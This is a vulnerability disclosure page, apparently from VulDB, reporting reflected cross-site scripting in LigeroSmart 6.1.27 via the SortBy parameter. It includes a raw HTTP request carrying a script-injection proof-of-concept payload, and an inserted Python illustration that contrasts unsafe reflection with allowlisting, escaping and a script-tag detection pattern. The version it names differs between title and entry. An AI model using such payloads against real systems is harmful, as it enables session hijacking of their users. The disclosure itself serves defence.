Submission #749784: LigeroSmart LigeroSmart (OTRS-based platform) 6.1.27 Cross-Site Scripting (XSS) - Reflected XSS Info

Title: LigeroSmart LigeroSmart (OTRS-based platform) 6.1.27 Cross-Site Scripting (XSS) - Reflected XSS
Description: LigeroSmart Service Desk v6.1.27 is vulnerable to reflected XSS via the `SortBy` parameter. The vulnerability occurs due to improper input validation and output encoding of the `SortBy` parameter in requests sent to `/otrs/index.pl`. An authenticated attacker can inject arbitrary JavaScript code via this parameter, which is reflected in the HTTP response and executed in the context of the victim's browser. Docker was installed and tests were performed. https://github.com/LigeroSmart/docker-ligerosmart

REQUEST

POST /otrs/index.pl HTTP/1.1
Host: localhost:9090
Content-Length: 46
sec-ch-ua-platform: "Windows"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:9090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9090/otrs/index.pl?
Accept-Encoding: gzip, deflate, br
Cookie: OTRSAgentInterface=mGvYIUIyihthTyFtxMhNihGuC3BGLRnw
Connection: keep-alive

;SortBy='"()%26%25<ScRiPt>alert(7777)</ScRiPt>

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Disposition: filename="AgentDashboard.html"
Content-Type: text/html; charset=utf-8;
Date: Sat, 31 Jan 2026 13:21:19 GMT
Expires: Tue, 1 Jan 1980 12:00:00 GMT
Pragma: no-cache
Server: nginx
X-Frame-Options: SAMEORIGIN
X-Ua-Compatible: IE=edge,chrome=1
Content-Length: 99734

<!DOCTYPE html>
<html>
...
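As an added illustration, not taken from the report or from the LigeroSmart/OTRS code base, the Python below contrasts the unencoded reflection the description refers to with the two controls it names, input validation (an allowlist of sort columns) and output encoding. The column names in the allowlist and the small body parser are assumptions; the sample body is a constructed copy of the one in the request above.

```python
import html
import re
from urllib.parse import unquote_plus

# Assumed allowlist of sortable columns; LigeroSmart's real column set is not on the page.
ALLOWED_SORT_BY = frozenset({"Age", "Title", "Queue", "State", "Priority"})
DEFAULT_SORT_BY = "Age"

# Constructed copy of the request body from the report (OTRS separates fields with ';').
SAMPLE_BODY = ";SortBy='\"()%26%25<ScRiPt>alert(7777)</ScRiPt>"

SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def parse_otrs_body(body: str) -> dict:
    """Parse a ';'-separated x-www-form-urlencoded body, percent-decoding keys and values."""
    params = {}
    for field in body.split(";"):
        if "=" not in field:
            continue  # skips the empty field produced by the leading ';'
        key, _, value = field.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def vulnerable_sort_link(sort_by: str) -> str:
    """The pattern the report describes: the raw parameter lands in the HTML unchanged."""
    return f'<a href="/otrs/index.pl?SortBy={sort_by}">Sort</a>'


def safe_sort_by(sort_by) -> str:
    """Control 1, input validation: accept only known column names, otherwise fall back."""
    return sort_by if sort_by in ALLOWED_SORT_BY else DEFAULT_SORT_BY


def encode_for_html(value: str) -> str:
    """Control 2, output encoding: escape <, >, &, ' and " before reflecting a value."""
    return html.escape(value, quote=True)


def safe_sort_link(sort_by) -> str:
    """Both controls together: validate the value, then encode whatever is reflected."""
    return f'<a href="/otrs/index.pl?SortBy={encode_for_html(safe_sort_by(sort_by))}">Sort</a>'


def contains_script_tag(markup: str) -> bool:
    """Crude check used here only to show whether a rendered fragment still carries a script tag."""
    return SCRIPT_TAG.search(markup) is not None
```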
Source: ⚠️ https://github.com/LigeroSmart/ligerosmart/issues/283
User: Samara Gama - igobysamy (UID 81801)
Submitted: 2026-01-31 14:53 (3 months ago)
Moderation: 2026-02-15 17:00 (15 days later)
Status: Accepted
VulDB Entry: 346155 [LigeroSmart up to 6.1.26 /otrs/index.pl SortBy cross site scripting]
Points: 20
